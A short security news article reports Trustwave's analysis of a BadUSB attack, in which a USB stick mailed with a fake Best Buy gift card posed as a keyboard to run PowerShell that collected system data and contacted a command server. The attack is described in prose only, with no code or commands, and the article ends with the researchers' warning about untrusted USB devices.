Security researchers at Trustwave have published details of an attempted USB drive-based scam on one of their unnamed clients. The attack occurred after the company received an envelope containing a fake BestBuy gift card, along with a USB thumb drive.

The letter was supposedly from Best Buy giving out a $50 gift card to its loyal customers. The receiving company was offered to plug in the USB drive purportedly containing a list of items the gift card could be used for.

In reality, the USB drive was what security experts call a "BadUSB" - an attack, which allows to turn any USB device into a cyber weapon that is able to immediately inject malware code into a computer without the possibility to be detected.

The analysed USB device used an Arduino microcontroller ATMEGA32U4 and was programmed to emulate a USB keyboard and automatically inject malicious commands.

Once the researchers plugged the BadUSB device into a test workstation, a PowerShell script was launched which downloaded a second PowerShell script and a JScript code that collects system information from infected host (username, hostname, user’s system privilege, domain name, OS information, list of installed apps and running processes). The gathered data is then send to the command & control (C2) server. The malware then jumps into a loop awaiting instructions from the C2 server.

“These types of USB devices are widely known and used by security professionals. The fact that they are also cheap and readily available to anyone meant that it was just a matter of time to see this technique used by criminals "in the wild." Since USB devices are ubiquitous, used, and seen everywhere, some consider them innocuous and safe. Others can be very curious about the contents of an unknown USB device. If this story teaches us anything, it's that one should never trust such a device,” the researchers conclude.